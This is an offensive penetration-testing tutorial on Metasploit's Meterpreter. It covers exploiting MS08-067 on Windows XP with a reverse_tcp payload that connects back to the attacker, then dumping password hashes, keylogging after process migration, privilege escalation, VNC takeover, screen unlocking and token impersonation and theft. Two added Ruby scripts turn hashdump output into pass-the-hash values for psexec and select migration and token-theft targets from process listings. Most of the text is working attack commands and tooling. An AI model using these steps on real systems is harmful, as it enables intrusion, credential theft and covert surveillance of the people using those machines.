Metasploit 4

Meterpreter part 1

What is Meterpreter?

Meterpreter is a staged payload: a small stager runs first, then the Meterpreter DLL is loaded straight into the memory of the exploited process (reflective DLL injection), so by itself it writes nothing to disk.
That is why antivirus that only scans files tends not to catch it. It is not undetectable, though: memory scanners, behavioural detection and the stage download on the wire (sent in the clear by the stager) can still expose it.
Once the stage is loaded, Meterpreter encrypts its channel back to the attacker.

Now let's attack a Windows machine (Windows XP) and use Meterpreter as the payload.

First we select the ms08_067_netapi exploit (MS08-067: an unauthenticated stack buffer overflow in the Server service, reached over SMB, that gives code execution as SYSTEM)
use exploit/windows/smb/ms08_067_netapi

Then we set the remote host (the victim's IP address)
set RHOST <victim IP>

Then we choose Meterpreter as the payload
set PAYLOAD windows/meterpreter/reverse_tcp

and set the IP address of the local machine (attacker), so that the victim connects back to us (the listening port, LPORT, defaults to 4444)
set LHOST <attacker IP>


Then we launch it
exploit

The exploit (ms08_067_netapi) succeeds and the remote machine (victim) connects back to the local machine (attacker).
Now we have a Meterpreter session open.

Let's explore some basic Meterpreter commands:

1- sysinfo
collects information about the system: computer name, OS version, architecture, language

2- screenshot
captures the current desktop to an image file saved on the attacker side

3- hashdump
dumps the local password hashes from the SAM, one line per account in pwdump format (user:RID:LM hash:NT hash:::).
It needs SYSTEM privileges; the ms08_067 session already has them because the exploited service runs as SYSTEM.

Note: Meterpreter ships with many scripts (vnc, winenum, chrome_enum, killav, ...).
To run one, type run <script name>, for example run chrome_enum to collect Chrome credentials.
To list all Meterpreter scripts, type run and hit Tab twice. Newer Metasploit versions mark these scripts as deprecated in favour of post modules (run post/windows/gather/...), which cover the same ground.
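As an added example (written for this page in Ruby, Metasploit's own language; it is not code from Metasploit or from the original tutorial), here is a small triage script for the pwdump-style lines that hashdump prints. It flags accounts with a blank password, accounts that still have an LM hash stored (the weak, easily cracked format Windows XP keeps by default), finds the built-in Administrator by RID even if renamed, and builds the LM:NT pair that the psexec module accepts for pass-the-hash. The hashes in SAMPLE_HASHDUMP are constructed for illustration and were not captured from a real host.

```ruby
# Added example: triage Meterpreter `hashdump` output (pwdump format):
#   username:RID:LM_hash:NT_hash:::
# SAMPLE_HASHDUMP below is constructed; it was not captured from any real host.

# Values Windows stores when the corresponding hash is absent.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee" # no LM hash (LM disabled or password > 14 chars)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0" # NT hash of the empty password

SAMPLE_HASHDUMP = <<~DUMP
  Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:0b5f1c6a8e0b0b2c6d9e0f1a2b3c4d5e:6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:4c1e5a9f2b8d7e6c3a0f1b2d9e8c7a6b:::
  bob:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  not a hash line
DUMP

Entry = Struct.new(:user, :rid, :lm, :nt) do
  # An LM hash is present: DES-based, case-insensitive, cracked in minutes.
  def lm_stored?
    lm != EMPTY_LM
  end

  # NT hash of "" means the account has no password at all.
  def blank_password?
    nt == EMPTY_NT
  end

  # RID 500 is the built-in Administrator even if the account was renamed.
  def builtin_admin?
    rid == 500
  end

  # Value for the SMBPass option of exploit/windows/smb/psexec (pass-the-hash).
  def smbpass
    "#{lm}:#{nt}"
  end
end

# Parse hashdump text into Entry objects, skipping anything that is not a
# well-formed pwdump line (status messages, prompts, blank lines).
def parse_hashdump(text)
  text.each_line.map do |line|
    fields = line.strip.split(":")
    next unless fields.size >= 4 && fields[1] =~ /\A\d+\z/
    lm, nt = fields[2].downcase, fields[3].downcase
    next unless lm =~ /\A\h{32}\z/ && nt =~ /\A\h{32}\z/
    Entry.new(fields[0], fields[1].to_i, lm, nt)
  end.compact
end

# Summarise the dump the way an operator reads it before choosing a next step.
def triage(entries)
  {
    blank_password: entries.select(&:blank_password?).map(&:user),
    lm_stored:      entries.select(&:lm_stored?).map(&:user),
    builtin_admin:  entries.find(&:builtin_admin?)&.user,
    # Hashes worth feeding to a cracker: blank passwords need no cracking.
    crack_queue:    entries.reject(&:blank_password?).map { |e| "#{e.user}:#{e.nt}" },
  }
end

if __FILE__ == $PROGRAM_NAME
  entries = parse_hashdump(SAMPLE_HASHDUMP)
  triage(entries).each { |k, v| puts "#{k}: #{v.inspect}" }
  admin = entries.find(&:builtin_admin?)
  puts "psexec SMBPass for #{admin.user}: #{admin.smbpass}" if admin
end
```

Paste the real hashdump output into a file and pass its contents to parse_hashdump; the parser ignores the "[*]" status lines the console prints around the hashes.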

4- Keystroke capture
A keylogger records the keys struck on the keyboard. Meterpreter captures keystrokes from inside the process it lives in, which is why the first step is to move it into the right process.

A- Migrate to explorer.exe
First use the ps command to list all processes on the remote machine and note the PID of explorer.exe (here explorer PID = 1432)
Then we migrate.
What is migrate?
It moves the Meterpreter session from its current process into another one. Two reasons to do it here: the session survives if the original process dies (the exploited service may crash or be restarted), and explorer.exe is the logged-on user's desktop shell, so a keylogger running inside it sees what that user types. The target must be a process the session is allowed to open; as SYSTEM that is any process, and migrating into winlogon.exe instead would capture the logon password.

migrate 1432

B- run keylog_recorder

Note: the output file is written on the attacker machine under "/root/.msf4/logs/scripts/keylogrecorder/"

Now, on the Windows machine, type something at the keyboard, for example
ping then CTRL+C

C- To stop the keylogger hit CTRL+C in the Meterpreter console

Now let's view the dumped file
cat /root/.msf4/logs/scripts/keylogrecorder/

The typed keystrokes are there, as expected.

5- Privilege Escalation

To become SYSTEM (NT AUTHORITY\SYSTEM: full access, above a local Administrator account)

A- Load the priv extension (current Metasploit versions load it automatically, so this is a no-op there)
use priv

B- To become SYSTEM
getsystem

C- To verify the privilege level
getuid

getsystem tries a few local techniques (named-pipe impersonation, token duplication) that all need the session to already hold administrative rights; from an unprivileged user it fails and a real local privilege-escalation exploit is needed first. The ms08_067 session starts as SYSTEM anyway, so here getuid already shows NT AUTHORITY\SYSTEM.

6- VNC

VNC (Virtual Network Computing) is remote desktop software.

To get a VNC view of the remote desktop
run vnc
(the script injects a VNC server payload into the target and starts a local vncviewer through the Meterpreter session; convenient, but noisy, since the victim's desktop is driven live)

To unlock a locked remote screen
run screen_unlock
(this patches the logon code in memory using patterns for specific Windows versions, so it can fail on builds it does not know)

7- Token impersonation

Every Windows process and thread carries an access token describing the user it runs as. By taking over a token that is still present on the machine we can act as that user, locally or on the network, without ever learning their credentials.

There are two types of tokens
1- delegate: created for interactive logons such as logging on at the console or over Remote Desktop; they can be used locally and to authenticate to other hosts on the network
2- impersonate: created for non-interactive logons such as mapping a network drive or running a domain logon script; they are only usable on the local machine
Tokens exist only while the process holding them is alive (and never survive a reboot), so what is available changes over time.

To do so you have to load the incognito extension

use incognito

Then list the tokens available (-u lists them by user, -g by group)
list_tokens -u

To take the token of SYSTEM
impersonate_token "NT AUTHORITY\\SYSTEM"
(the backslash is doubled because the Meterpreter console treats a single one as an escape character)

Now we are running as SYSTEM (full access); getuid confirms it, and rev2self drops the impersonation and returns to the session's original token.


Use the ps command to list all running processes; then you can steal the token of the owner of any process the session is allowed to open (as SYSTEM, any of them)

A- ps

Now, if we want to run as Administrator, we pick a process owned by Administrator, here wuauclt.exe with PID = 1528 (any other process owned by Administrator would do)

B- steal_token 1528

getuid now reports the Administrator account, and the session keeps that token until rev2self.
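Both the migration step in section 4 (find explorer.exe in the ps listing) and the token theft above (find a process owned by a given user) start from the same chore: reading the table that ps prints. As an added example, written for this page in Ruby and not code from Metasploit or the original tutorial, the script below parses that table by the column positions in its dashed underline, so values that contain spaces (NT AUTHORITY\SYSTEM) and empty cells do not break it, then picks the migration target and the steal_token candidates. SAMPLE_PS is constructed to match the Metasploit 4 layout and reuses the PIDs from the page (1432, 1528); it is not output from a real host.

```ruby
# Added example: parse the table Meterpreter's `ps` command prints and pick
# (a) a migration target and (b) processes whose token can be stolen.
# SAMPLE_PS is constructed to match the Metasploit 4 column layout; it is
# not output from a real host.

SAMPLE_PS = <<~'PS'
  Process list
  ============

   PID   PPID  Name               Arch  Session  User                    Path
   ---   ----  ----               ----  -------  ----                    ----
   0     0     [System Process]
   4     0     System             x86   0        NT AUTHORITY\SYSTEM
   620   4     winlogon.exe       x86   0        NT AUTHORITY\SYSTEM     \??\C:\WINDOWS\system32\winlogon.exe
   684   620   lsass.exe          x86   0        NT AUTHORITY\SYSTEM     C:\WINDOWS\system32\lsass.exe
   1432  1404  explorer.exe       x86   0        VICTIM\user             C:\WINDOWS\Explorer.EXE
   1528  1084  wuauclt.exe        x86   0        VICTIM\Administrator    C:\WINDOWS\system32\wuauclt.exe
   2104  1432  cmd.exe            x86   0        VICTIM\user             C:\WINDOWS\system32\cmd.exe
PS

# Column starts come from the dashed underline beneath the header, so the
# parser copes with values containing spaces ("NT AUTHORITY\SYSTEM") and with
# empty cells (the idle process has no Arch/Session/User/Path).
def parse_ps(text)
  lines = text.lines.map(&:rstrip)
  hdr = lines.index { |l| l.strip.start_with?("PID") }
  raise ArgumentError, "no process table header found" unless hdr

  starts = []
  lines[hdr + 1].scan(/-+/) { starts << Regexp.last_match.begin(0) }
  bounds = starts.each_with_index.map { |s, i| [s, starts[i + 1]] } # [start, next start or nil]
  names  = bounds.map { |s, e| lines[hdr][s...(e || lines[hdr].size)].strip.downcase.to_sym }

  lines.drop(hdr + 2).map do |row|
    cells = bounds.map { |s, e| (row[s...(e || row.size)] || "").strip }
    rec = names.zip(cells).to_h
    next unless rec[:pid] =~ /\A\d+\z/ # skip blank lines and trailing status text
    rec[:pid]  = rec[:pid].to_i
    rec[:ppid] = rec[:ppid].to_i
    rec
  end.compact
end

# Migration target: explorer.exe is the logged-on user's desktop shell, so a
# keylogger inside it sees what that user types, and it outlives the exploited
# service process. Returns the PID, or nil when the process is not running.
def migrate_target(procs, name = "explorer.exe")
  hit = procs.find { |p| p[:name].downcase == name.downcase }
  hit && hit[:pid]
end

# Token theft: every process whose primary token belongs to `user` is a
# candidate for steal_token (the session needs SYSTEM or SeDebugPrivilege
# to open it). Returns [[pid, name], ...] in listing order.
def processes_owned_by(procs, user)
  procs.select { |p| p[:user].downcase == user.downcase }.map { |p| [p[:pid], p[:name]] }
end

if __FILE__ == $PROGRAM_NAME
  procs = parse_ps(SAMPLE_PS)
  puts "migrate #{migrate_target(procs)}"
  processes_owned_by(procs, 'VICTIM\Administrator').each do |pid, name|
    puts "steal_token #{pid}   # #{name}"
  end
end
```

The process list is a snapshot: PIDs change when the user logs off or a process restarts, so re-run ps (and this selection) right before migrate or steal_token rather than reusing numbers from an earlier listing.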